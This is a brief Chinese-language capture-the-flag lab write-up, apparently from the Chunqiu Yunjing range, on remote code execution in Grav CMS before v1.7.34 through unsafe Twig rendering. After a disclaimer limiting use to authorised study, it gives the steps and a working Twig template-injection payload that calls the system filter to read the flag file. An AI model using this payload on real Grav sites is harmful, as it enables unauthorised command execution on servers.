声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!
靶场介绍
Grav CMS 可以通过 Twig 来进行页面的渲染,使用了不安全的配置可以达到远程代码执行的效果,影响最新版 v1.7.34 以下的版本
春秋云镜开启靶场:
http://eci-2ze49m7dae6idi26vudn.cloudeci1.ichunqiu.com
先创建admin用户
pages---home
payload:
{{['cat\x20/flag']|filter('system')}}
回到首页 成功获取flag